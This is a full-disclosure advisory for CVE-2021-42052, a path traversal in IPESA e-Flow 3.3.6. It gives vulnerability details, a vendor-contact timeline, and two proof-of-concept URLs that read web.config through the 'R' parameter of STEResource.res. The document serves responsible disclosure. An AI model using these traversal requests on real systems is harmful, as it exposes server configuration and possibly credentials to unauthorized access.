CVE-2021-42052: CVE-2021-42052 full disclosure - NXNJZ

Vulnerability Details

IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res R parameter.

---

[Vulnerability Type] Directory Traversal

---

[Vendor of Product] IPESA

---

[Affected Product Code Base] e-Flow - v.3.3.6

---

[Affected Component] /lib/js/build/STEResource.res

---

[Attack Type] Remote

---

[Impact Information Disclosure] true

---

[Attack Vectors] Basic path traversal sequence in the ‘R’ query parameter

---

[Discoverer]

nxnjz

---

[Reference] https://ipesa.com/seccion/gestiondecolaseflow.html

Proof of Concept

https://example.tld/STE/lib/js/build/STEResource.res?R=../../../../../web.config

https://example.tld/lib/js/build/STEResource.res?R=../../../../../web.config

Timeline

• May 31, 2021: Vulnerability discovered and reported to a bug bounty program.
• August 4, 2021: Bug bounty program resolved the issue on their affected site.
• October 6, 2021: Contacted e-Flow vendor via website form, no response.
• October 7, 2021: CVE-2021-42052 reserved.
• October 26, 2021, Contacted the vendor via their Whois registrant email address, no response.
• October 26-29, 2021: Contacted the vendor via their Whatsapp customer service. They forwarded the issue.
• November 11, 2021: Received a request for vulnerability details from the vendor.
• November 11, 2021: Sent the requested info, and asked for an estimated time to resolution, no response.
• February 21, 2022: Asked the vendor for an update, no response.
• August 8, 2022: Publishing full disclosure.

Post navigation